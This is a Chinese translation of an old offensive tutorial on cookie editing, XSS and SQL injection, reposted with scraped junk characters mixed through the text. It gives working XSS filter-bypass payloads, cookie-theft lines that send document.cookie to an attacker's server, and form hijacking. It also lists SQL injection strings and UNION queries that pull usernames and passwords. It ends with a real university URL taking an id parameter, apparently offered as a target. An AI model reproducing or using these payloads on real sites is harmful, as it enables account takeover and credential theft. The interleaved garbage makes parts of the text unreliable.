XSS & SQL注入

admin

XSS & SQL注入
9 F! d2 }- ?' f- m, L7 D文章作者：CyberPhreak
译文作者：黯魂 [S.S.T]


1 ~9 ?- d6 H5 U* b0 f: q- RXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X Web Security - XSS & more X
/ @( G' x1 }2 {0 ?' W- cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
1 H" [% }6 }! f3 [! q
" E. q3 W  l5 l5 [0 V% s
~介绍
' h4 m3 X' C0 g6 n# _
1 V. P7 _) {$ N: j在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.

0 F5 F9 G% v/ o: G7 HXXXXXXXXXXXXXXXXXXXXX
X Table OF Contents X
XXXXXXXXXXXXXXXXXXXXX

2 y, k/ s, J6 a, E: H3 @4 vXXXXXXXXXXXXXXXXXXXX
) K3 C9 |3 d3 ^; O- MX Cookie Editing X
X XSS X
2 [2 z& b) }! l# uX SQL Injection X
/ e/ t' _- F3 S( c# q9 F' lXXXXXXXXXXXXXXXXXXXX
# \9 C% a0 w9 K
~什么是cookie
, Z2 J# f  J8 b1 G- H
cookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.
) L5 s- r) J$ r/ ^
1 E7 F: b. B, a* Y5 I# N7 h* e~警告&欺骗
7 N6 a% ~8 K3 E5 {0 b. U
+ r- `. c" z' w1 L* A那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:
! O: y! Y& R" p: z$ f% E
strusername=cnsst;strpassword=cnsst

此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...

1 @' i# L4 f  O~什么是XSS

XSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.
; m" k3 e$ t8 u5 M: g: T
~为什么使用XSS
2 f/ F9 P, @9 Y4 O1 U2 h% |' E
" X4 N% S( g; a# n很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:<input name="name" type="name">
% t# n5 P+ x0 B/ ]5 r你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.
- h# j* y; |3 H* d1 O( ^; u6 Z5 z# G
~让我们开始吧…

$ ]0 `) K9 D; I% l* p我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.
, ]- P/ Z+ j7 G) |
( a. t) ~' z% G) {) _: v3 iXSS--跨站脚本&lt;html&gt;

4 k7 r" ~' u/ k3 L&lt;body&gt;
. O6 K9 C! h: f: |- |* f/ \, K
* o' l9 \, x! G" [* a&lt;form action="" method="GET"&gt;
/ u- _; Z  h9 y; D7 V4 M1 r$ B: ^
&lt;!-- 我使用的GET方法,因为当我们利用的时候更容易练习. --&gt;

1 D( v, ~7 k: B; hScript: &lt;input name="name" type="name"&gt;

&lt;input type="submit" value="submit"&gt;
- M8 ~" K+ X$ p: {  ^1 x
2 l) J; p0 _0 [; L&lt;/form&gt;
! A* u* b' n4 C* ?/ a- l3 K- y
&lt;/body&gt;
5 e4 e( [& j( ?' z' k) b/ u
&lt;/html&gt;

( L! n. z; w2 ^

1 C* \  _) a; b/ r) b6 e. ?&lt;?php
$ S4 c0 }" v! U' z
( O3 o' N! h0 E2 e9 V5 U! l8 L$name = $_GET['name'];
) X& G; K( O5 D% g' v+ \/ z
echo("Hello $name");
7 o  C: A- D# L3 k( L
?&gt;
0 a5 e; P: C( Z复制代码OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:
( ~/ b$ B" o3 V, w' m# R2 ?
% C7 V1 ?* w: T, Scnsst
% C. m1 M! H4 ^, F7 v% G( a9 T; I+ w+ Y' ~"Hello cnsst!"
, Z7 ~. E8 w+ ?
! E5 |* E7 r" T' @引号内的信息就是输出信息..注意看,现在我输入:
<script>alert(document.cookie)</script>
6 ^1 X, S, q5 v% y: p: T. A- A9 y
8 t$ [, T4 z2 O% R那么它将会弹出document.cookie!所以它是易受XSS攻击的!

0 V! ?' k4 n# E2 |9 Y现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...
+ x8 U* E- e# r2 G- @6 j( J5 t
+ B9 B3 Q# U# [# S, H7 m- [+ N- H# F+ \服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...

已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.
: ^4 F. z5 x8 |8 W6 W
' y4 f" d- E& X( Q" h) T让我们看一个稍微复杂点的例子!

假设你已经输入了<script>alert(document.cookie)</script>,并且回显是这样的:
- _% P3 k- L" e, Pscriptalert(document.cookie)/script
9 S1 r  o+ D. V; Y, Z* X或者可能是这样的:
! V: `1 _6 L/ h+ ]( ^scriptalertdocument.cookie/script
3 R. x4 k2 H9 v+ L1 t! x- z
可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.
/ Y( C4 k- G2 J+ ?- d
5 V) q; z- h( w& K4 n6 I让我们继续利用:
" \/ j* {+ p) \7 s: l9 m<<script>>alert(document.cookie)<</script>>

8 O' P1 w/ H. `, w你的输出将弹出document.cookie.
+ k4 C- |; g" |1 @7 Y% A
现在来看看更狠的:
8 O  R5 b, G9 t& c& `) x, `<<script>>alert((document.cookie))<<//script>>


8 r# ~3 a8 H  w- H( X他们可能会替换所有的,或者只是"<>".所以如果一对不能得以执行,另一对就可以.现在,如果你看到:
scriptalertdocument.cookie/script
或者 <<<script>>>alert(document.cookie)<<</script>>>  
% e% `* u6 {* f  \
: Y  ]* {( S4 d他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:
<script>alert(document.cookie)</script>
( r6 }$ v" F- j' G8 o
输出像这样:srplert(document.cookie)srp
  U% @$ U; v& _" T2 G
5 q& i: r1 d7 M, }% j7 ]+ `仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>

: x% i5 Z" d- j+ Z0 }( M所有重复多余的部分刚好被替换!现在让我们来点更高级的!
# Q2 j$ b3 @& ?3 `' L: T" H& F  d
这次他们使用的仍然是替换,但是却检查了整个字符串!例如:
<script>alert(document.cookie)</script>
* S  C) Y- E5 D2 V3 s& V
5 P, i+ Y9 `7 }6 R& C% K7 M5 z8 s+ A- ]; b输出将是:
scriptalert(document.cookie)script

, m9 ^$ l' s) [; x. A4 j7 v1 [看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
<<script>>alert(document.cookie)<</script>>

8 D+ J3 c% S8 p8 O2 J7 Q输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:
0 ]% z& i2 @3 T2 ]8 @" t
<
+ q( T' l! b% W5 j5 W! Ascript
>
* C4 y1 a& D. r, t8 x( G2 i# K4 S1 [alert
/ K) Z) F1 @& L7 V. R& M8 s(
document
.
cookie
)
, e: }& \* l3 J# x<
/
. N8 Z# Z  n3 s5 Bscript
>


$ F) {* o; a: p3 I, |, J! G8 r看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
# k; L3 ?- w' {4 g3 ?# u<
s
c
r
i
0 m* y6 q$ v9 D8 X. `. s7 E9 X* ~p
t
>
# \2 u9 e  @0 j2 m" Ha
9 {2 p, h, ~+ k- Vl
e
) g! j5 S2 }6 Hr
3 q9 X. k) a9 e8 o  xt
8 C' S" a1 x' L2 j(
d
o
- D  Y& P! d+ U# B2 O& T- Tc
u
4 y$ \; `) H/ i) x4 G3 |m
5 k* _1 ~0 A" i- y5 P0 |0 ~e
n
1 v7 Q& K8 L( [/ I* o1 m+ St
8 L* W: p; J& z- Y.
1 l. X9 K# @9 c$ i: w  Z; Kc
/ C0 U3 i$ D4 ko
3 t- D  m9 K' ?o
k
9 l6 A- N- o6 y6 f+ c2 K/ _& B; Wi
e
)
<
$ d. r) Z2 \# p5 g$ Y7 J" a/
- M) f( x) }9 N0 p; ~5 ls
c
8 B% i3 I' W5 }2 H% L1 |1 Z, @5 er
8 a; Z, Y& r. C. z7 d. W# Ni
1 c/ g7 z( d! g" lp
t
/
>

. W/ Z# A% `$ o这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)
/ n) W( ]  A& M/ m2 n6 R) e
% E- T8 H: Z+ c6 `  D# C$ `还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.
% A) X* G4 K1 ^0 P! {2 x+ b: Q# O5 |
现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.
! S( k( a) C4 q, j' K
/ ]+ o& g, f" X0 h8 {1 x首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.

* n  R) ?4 m& y! e我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
document.forms(0).action ="http://myserver/myscript.php
这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.
& ~* h- M( {0 b0 s6 |
3 ~6 x! F% e% Z6 `0 s1 V. @# l: H& c再次假设你在网站上注册了一个帐号,并且可以自定义资料...
- ~/ d& `8 k1 c+ Y: ^. @document.images(0).src="http://myserver/cookie.php"+document.cookie.
2 v. P; C0 ?# p( a或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
9 p. b" i  Q, ^# `javascript:location.href="http://myserver/cookie.php"+document.cookie
这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.

" J' s; Y& w' X6 Q& z+ Z( ]6 H: U. q9 d有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,
telnet example.com
GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
User-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
Referer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
~什么是SQL注入

5 ^- _: s! h! Q* D! f; a/ f6 CSQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:&lt;html&gt;
5 B4 x8 [3 w: J; D: P+ P0 Y
&lt;body&gt;
% ?( T$ h2 @- ~  O0 p( R0 S
9 Y6 n+ p; T; g1 m2 K&lt;form action="" method="POST"&gt;
! A9 D. s) g0 e* q4 D
Username: &lt;input name="name" type="name"&gt;
0 J0 }0 Q- B0 h' ^" t  {7 Y6 _
& I2 D8 f. e+ m5 M, ]! c8 VPassword: &lt;input name="password" type="password"&gt;

* C3 o& |0 F0 A&lt;input type="submit" type="submit" value="Submit"&gt;
0 B* t8 |1 y6 k6 o2 a1 A0 a* P" q0 X
3 G* x+ A: J" G3 v3 w4 l  F' H&lt;/form&gt;

5 W4 j, T( B- f) M&lt;/body&gt;
. g% r3 [  G9 b
&lt;/html&gt;
2 D) Y3 Q3 R" ^1 @& Q3 K复制代码这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!
8 ^" y, L7 x0 V7 f0 f  [3 K
  J5 [+ Z  L. e) N  z最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.
3 N3 r0 J+ \. A1 W! @
' w+ Y. l  |, e" O! J; u'='
5 @5 @3 N7 d4 n" g, A'OR 1=1--
'OR a=a--
'OR'
3 n. [" p9 A( ]4 b$ L
自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:
6 p3 r" q( B7 m5 L/ V- O9 L
9 H! o' e# ]7 Q- I'OR''='
'OR"="
'OR'="
, y/ A$ h( q& l9 Y. I9 Z1 ?. o'OR '="
/ }* |& D, X1 h2 I. ?4 p'OR "='
/ N) r( a, D! u8 v0 Y'OR ''='
3 `/ a% j% ^' \6 @1 Q7 ~  o'OR '=''
'OR "=''
'OR ''="


~
现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
UNION ALL SELECT username,password FROM users

) x7 v$ ?9 j- ]4 {3 x这个查询语句将执行,但是….如果毫无作用呢?
( c5 c4 w- v. Z0 r: hUNION ALL SELECT username,password FROM users WHERE username='OR "='
AND password='OR "='

4 n3 y7 {/ [% \; }你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.

一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
$ w8 I; _2 L1 o% H6 ^* OUNION ALL SELECT
ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
+ R; X, z- C/ b+ zWHERE ip='OR''="

现在你看到这个了吗?(我确信你已经看到了)
! Q3 M3 ~+ }- l$ }* E$ ohttp://example.com/index.php?article=34
那将浏览Id为34的文章...让我们用"'"替换34:
http://example.com/index.php?article='


现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
4 S1 e7 E( ^. u, U5 Ghttp://example.com/index.php?article='
0 g' u# j# |/ j8 X5 }http://example.com/index.php?article='='
http://example.com/index.php?article='OR 1=1--
9 r0 I$ c+ ]( L# g. y6 |  Dhttp://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
! j2 D' f$ ~8 v4 Q4 Ghttp://example.com/index.php?article='OR "='
2 K/ k. X5 s, c7 Qhttp://example.com/index.php?article='OR ''='
http://example.com/index.php?article='OR '=''
; i4 L' L8 J0 Hhttp://example.com/index.php?article='OR''='
http://example.com/index.php?article='OR"'='
! A5 j- r. o8 d1 L2 t* G, o* rhttp://example.com/index.php?article='OR"''='
+ [1 T' @& X9 \
尽情发挥自己的创造力!
" B6 z3 M2 I3 Q" k/ ohttp://www.ie.tsinghua.edu.cn/notice/show.php?id=704